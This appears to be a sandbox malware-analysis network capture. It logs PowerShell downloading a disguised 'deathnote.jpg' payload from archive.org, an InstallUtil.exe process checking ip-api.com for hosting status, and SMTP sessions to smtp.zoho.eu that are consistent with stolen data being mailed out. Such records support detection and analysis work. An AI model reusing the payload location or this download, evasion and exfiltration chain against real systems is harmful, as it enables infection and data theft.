Aug 30, 2024 09:28:02.589162111 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.589180946 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.589193106 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.589210987 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.589234114 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.589261055 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.591207981 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.591243982 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.591252089 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.591264009 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.591265917 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.591284037 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.591290951 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.591315031 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.632972002 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.727874994 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.727890015 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.727957964 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.727994919 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.727997065 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.728017092 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.728044033 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.728054047 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.729515076 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.729535103 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.729605913 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.729620934 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.729684114 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.731342077 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.731360912 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.731426954 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.731436014 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.731482983 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.774813890 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.774836063 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.774985075 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.775002956 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.775105953 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.867804050 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.867830038 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.867930889 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.867949963 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.867996931 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.868316889 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.868336916 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.868392944 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.868397951 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.868439913 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.869901896 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.869923115 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.870002031 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.870008945 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.870048046 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.871664047 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.871684074 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.871769905 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.871781111 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.871869087 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.872665882 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.872684002 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.872740030 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.872745991 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.872783899 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.874420881 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.874465942 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.874526024 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.874535084 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.874577999 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.954796076 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.954823017 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.955020905 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.955039024 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.955152988 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:03.006658077 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.006680012 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.006865978 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.006896019 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.006988049 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:03.007004023 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.007038116 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:03.007082939 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:03.007091999 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.007134914 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:03.007405996 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.007421970 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.007477045 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:03.007486105 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.007527113 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:03.011532068 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.011552095 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.011617899 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:03.011630058 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.011640072 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.011658907 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.011676073 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:03.011681080 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.011710882 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:03.011739016 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:03.012010098 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.012028933 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.012079954 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:03.012084961 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.012126923 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:03.042176962 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.042249918 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:03.042437077 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:03.043047905 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:03.043047905 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:03.478079081 CEST	49732	80	192.168.2.4	208.95.112.1
Aug 30, 2024 09:28:03.482906103 CEST	80	49732	208.95.112.1	192.168.2.4
Aug 30, 2024 09:28:03.482973099 CEST	49732	80	192.168.2.4	208.95.112.1
Aug 30, 2024 09:28:03.483922005 CEST	49732	80	192.168.2.4	208.95.112.1
Aug 30, 2024 09:28:03.488744020 CEST	80	49732	208.95.112.1	192.168.2.4
Aug 30, 2024 09:28:03.940681934 CEST	80	49732	208.95.112.1	192.168.2.4
Aug 30, 2024 09:28:03.991112947 CEST	49732	80	192.168.2.4	208.95.112.1
Aug 30, 2024 09:28:04.684988976 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:04.690048933 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:04.690172911 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:05.599658012 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:05.599992990 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:05.600251913 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:05.600306034 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:05.606630087 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:05.937203884 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:05.937542915 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:05.944478989 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:06.116431952 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:06.123586893 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:06.128504992 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:06.303126097 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:06.303144932 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:06.303157091 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:06.303169012 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:06.303215981 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:06.303288937 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:06.306610107 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:06.311434984 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:06.485460997 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:06.504652023 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:06.510307074 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:06.684916019 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:06.686427116 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:06.691363096 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:06.912561893 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:06.912887096 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:06.917690992 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:07.328362942 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:07.328737974 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:07.338324070 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:07.511679888 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:07.512181997 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:07.517077923 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:07.888583899 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:07.908299923 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:07.908472061 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:07.948115110 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:07.953202009 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:08.128259897 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:08.129287958 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:08.129326105 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:08.129395008 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:08.129395008 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:08.135931969 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:08.135941982 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:08.137636900 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:08.137646914 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:08.785814047 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:08.834893942 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:08.860137939 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:08.864959002 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:09.328444004 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:09.328461885 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:09.328474998 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:09.328519106 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:09.328535080 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:09.328574896 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:09.329098940 CEST	587	49733	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:09.329144955 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:09.332145929 CEST	49733	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:09.333028078 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:09.343656063 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:09.343739986 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:09.915947914 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:09.916085958 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:09.921009064 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:10.091660023 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:10.091828108 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:10.096699953 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:10.272582054 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:10.272990942 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:10.277878046 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:10.448596001 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:10.449389935 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:10.449855089 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:10.454169989 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:10.454601049 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:10.756414890 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:10.756702900 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:10.773713112 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:10.944130898 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:10.950130939 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:10.955143929 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:11.141274929 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:11.141586065 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:11.146534920 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:11.317656994 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:11.317883968 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:11.322679043 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:11.493711948 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:11.493969917 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:11.498976946 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:11.669521093 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:11.681153059 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:11.681432009 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:11.681483030 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:11.681524038 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:11.681670904 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:11.681710005 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:11.681859016 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:11.681890965 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:11.681977987 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:11.688190937 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:11.688206911 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:11.688225031 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:11.688232899 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:11.688266993 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:11.688330889 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:11.688477993 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:11.688520908 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:12.075222015 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:28:12.116143942 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:28:54.678986073 CEST	49732	80	192.168.2.4	208.95.112.1
Aug 30, 2024 09:28:54.687474966 CEST	80	49732	208.95.112.1	192.168.2.4
Aug 30, 2024 09:28:54.687586069 CEST	49732	80	192.168.2.4	208.95.112.1
Aug 30, 2024 09:29:44.694907904 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:29:44.699831009 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:29:44.870826006 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:29:44.871099949 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:29:44.871110916 CEST	587	49734	185.230.212.164	192.168.2.4
Aug 30, 2024 09:29:44.871141911 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:29:44.871192932 CEST	49734	587	192.168.2.4	185.230.212.164
Aug 30, 2024 09:29:44.872102022 CEST	49734	587	192.168.2.4	185.230.212.164

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 30, 2024 09:27:57.862087011 CEST	61818	53	192.168.2.4	1.1.1.1
Aug 30, 2024 09:27:58.012710094 CEST	53	61818	1.1.1.1	192.168.2.4
Aug 30, 2024 09:28:00.704003096 CEST	59029	53	192.168.2.4	1.1.1.1
Aug 30, 2024 09:28:00.732908964 CEST	53	59029	1.1.1.1	192.168.2.4
Aug 30, 2024 09:28:03.463242054 CEST	61234	53	192.168.2.4	1.1.1.1
Aug 30, 2024 09:28:03.470998049 CEST	53	61234	1.1.1.1	192.168.2.4
Aug 30, 2024 09:28:04.670403004 CEST	53968	53	192.168.2.4	1.1.1.1
Aug 30, 2024 09:28:04.678291082 CEST	53	53968	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 30, 2024 09:27:57.862087011 CEST	192.168.2.4	1.1.1.1	0x99ab	Standard query (0)	ia601606.us.archive.org	A (IP address)	IN (0x0001)	false
Aug 30, 2024 09:28:00.704003096 CEST	192.168.2.4	1.1.1.1	0x880d	Standard query (0)	epanpano.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 09:28:03.463242054 CEST	192.168.2.4	1.1.1.1	0xb936	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 09:28:04.670403004 CEST	192.168.2.4	1.1.1.1	0x7880	Standard query (0)	smtp.zoho.eu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Aug 30, 2024 09:27:58.012710094 CEST	1.1.1.1	192.168.2.4	0x99ab	No error (0)	ia601606.us.archive.org	207.241.227.86	A (IP address)	IN (0x0001)	false
Aug 30, 2024 09:28:00.732908964 CEST	1.1.1.1	192.168.2.4	0x880d	No error (0)	epanpano.com	78.142.208.13	A (IP address)	IN (0x0001)	false
Aug 30, 2024 09:28:03.470998049 CEST	1.1.1.1	192.168.2.4	0xb936	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Aug 30, 2024 09:28:04.678291082 CEST	1.1.1.1	192.168.2.4	0x7880	No error (0)	smtp.zoho.eu	185.230.212.164	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ia601606.us.archive.org

epanpano.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	208.95.112.1	80	7736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Aug 30, 2024 09:28:03.483922005 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Aug 30, 2024 09:28:03.940681934 CEST	175	IN	HTTP/1.1 200 OK Date: Fri, 30 Aug 2024 07:28:03 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	207.241.227.86	443	7552	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-30 07:27:58 UTC	112	OUT	GET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1 Host: ia601606.us.archive.org Connection: Keep-Alive
2024-08-30 07:27:58 UTC	582	IN	HTTP/1.1 200 OK Server: nginx/1.25.1 Date: Fri, 30 Aug 2024 07:27:58 GMT Content-Type: image/jpeg Content-Length: 1931225 Last-Modified: Fri, 26 Jul 2024 22:09:28 GMT Connection: close ETag: "66a41e98-1d77d9" Strict-Transport-Security: max-age=15724800 Expires: Fri, 30 Aug 2024 13:27:58 GMT Cache-Control: max-age=21600 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With Access-Control-Allow-Credentials: true Accept-Ranges: bytes
2024-08-30 07:27:58 UTC	15802	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-08-30 07:27:58 UTC	16384	IN	Data Raw: 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b 33 82 a5 18 b5 55 83 ec 7d Data Ascii: G"82xv,sa pU?1^)ki[prMGbXT^IlSeFQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e3U}
2024-08-30 07:27:58 UTC	16384	IN	Data Raw: a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 